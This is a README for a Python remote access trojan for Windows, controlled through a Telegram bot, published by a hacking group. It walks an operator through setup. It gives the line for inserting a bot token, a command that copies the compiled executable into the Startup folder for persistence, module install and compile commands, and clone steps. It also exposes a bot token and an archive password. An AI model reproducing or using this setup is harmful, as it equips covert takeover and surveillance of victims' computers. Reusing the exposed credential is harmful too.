


Microsoft Windows Remote Administrator Tool

<h5>Language: Python</h5> <h5>Coder: Sir.4m1R</h5> <h5>Developer: Ahoora Mansouri</h5>
<h5>Powered By The404Hacking</h5> <h5>Digital Security ReSearch Group</h5>

Robot for initial Windows-Python-RAT testing

Bot ID: @W_P_RAT_Bot

Token: 586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY

Set Bot API-Token

To replace your robot Token in RAT, simply go to Line 35 in the Windows-Python-RAT.py file and place your API-TOKEN instead of TOKEN.

In Line 35:

#Replace Your Bot API-TOKEN
update = Updater("TOKEN")

Example for Replace Token:

Replace Token

StartUP Setting

For startup setting, you must first write the name of your bot before compiling it in the Windows-Python-RAT.py file. For example, before compiling the RAT file, you need to go to line 281 and name it as an YOUR-COMPILED-RAT-NAME.exe.

In Line 281:

os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'

Video Tutorial Setting Up a Startup on a RAT: Watch

StartUP Setting


Windows-Python-RAT requires Python version 2.7.x

Download Python Version 2.7.13: Click Here

Download Python

Python 2.7.14 - 2017-09-16

Download for Windows (.msi)

Install Python

Learning Install Python on Microsoft Windows: Click Here

Module in Python

To use the Windows-Python-RAT, you need to install the following modules in your python.

For automatic installation, you can first open the Setup.py (python Setup.py) file and select the [1] Install Module option.

To install the modules manually, simply enter the commands for installing each module in your CMD or Terminal.

Module List:

python -m pip install --upgrade pip

python -m pip install python-telegram-bot

python -m pip install pyttsx

python -m pip install pyinstaller

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

AutoPy Module in Python

learning Install AutoPy Module on Python 2: Watch

Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.

Password autopy-[@The404Hacking].rar File is: @The404Hacking

Clone and Run Setup

git clone ‎https://github.com/The404Hacking/Windows-Python-RAT.git
cd Windows-Python-RAT
python Setup.py
Download from ‎https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip
Extract files.
cd Windows-Python-RAT
python Setup.py


Windows-Python-RAT Logo

Setup ScreenShot:

Setup ScreenShot

RAT Control Panel @W_P_RAT_Bot:

RAT Control Panel ScreenShot1

RAT Control Panel ScreenShot2

Download and Clone

Download: Click Here

Clone: git clone https://github.com/The404Hacking/Windows-Python-RAT.git

The404Hacking | Digital UnderGround Team


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